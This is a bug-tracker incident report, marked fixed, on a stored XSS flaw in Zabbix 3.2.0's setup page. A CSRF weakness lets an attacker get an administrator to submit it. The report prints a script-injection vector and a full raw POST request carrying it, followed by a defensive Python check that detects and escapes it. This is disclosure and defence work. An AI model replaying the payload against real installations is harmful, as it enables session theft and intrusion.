Incident report
Resolution: Fixed
Trivial
3.2.0
LAMP
There is a stored XSS vulnerability in the Server name parameter.
This parameter is specified during the initial setup, but since /zabbix/setup.php is still available after the setup and there is no protection against CSRF attacks, a malicious attacker could convince an Admin to execute the script via a CSRF attack.
The vulnerable parameter is zbx_server_name.
Example vector: </title><script>alert(document.cookie)</script>
An example request for setting the Server name:
POST /zabbix/setup.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/zabbix/setup.php
Cookie: PHPSESSID=o7ok9rtqm50o0hptmppoqljen4; zbx_sessionid=da206dbd3fb3f8cb5dff506c773bd4e0; tab=2
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 184

sid=5dff506c773bd4e0&form_refresh=1&zbx_server=localhost&zbx_server_port=10051&zbx_server_name=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&next%5B3%5D=Next+step
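
The following is an added example, not part of the original report and not Zabbix code: a check that flags markup in zbx_server_name in a captured POST to setup.php, next to output encoding of the stored value. The function names and the finding label are hypothetical, and rendering into the page <title> is an assumption drawn from the example vector.

```python
import html
import re
from urllib.parse import parse_qs

# Characters that let a value leave the text context of <title> (assumed sink).
MARKUP = re.compile(r"[<>]")

def parse_request(raw):
    """Split a raw HTTP request into (method, path, form fields)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    method, path, _ = head.split("\n", 1)[0].split(" ", 2)
    parsed = parse_qs(body.strip(), keep_blank_values=True)
    return method, path, {k: v[0] for k, v in parsed.items()}

def audit_setup_post(raw):
    """Return findings for a POST to setup.php that sets zbx_server_name."""
    method, path, fields = parse_request(raw)
    if method != "POST" or not path.split("?")[0].endswith("/setup.php"):
        return []
    name = fields.get("zbx_server_name")
    if name is not None and MARKUP.search(name):
        # Hypothetical finding label, used only by this example.
        return [("markup-in-server-name", name)]
    return []

def render_title(server_name):
    """Encode the stored value for HTML output instead of emitting it raw."""
    return "<title>" + html.escape(server_name, quote=True) + "</title>"

# Constructed sample: request line, two headers and the body from the report.
SAMPLE = (
    "POST /zabbix/setup.php HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "sid=5dff506c773bd4e0&form_refresh=1&zbx_server=localhost"
    "&zbx_server_port=10051&zbx_server_name=%3C%2Ftitle%3E%3Cscript%3E"
    "alert%28document.cookie%29%3C%2Fscript%3E&next%5B3%5D=Next+step"
)

if __name__ == "__main__":
    for rule, value in audit_setup_post(SAMPLE):
        print(rule, repr(value))
        print(render_title(value))
```
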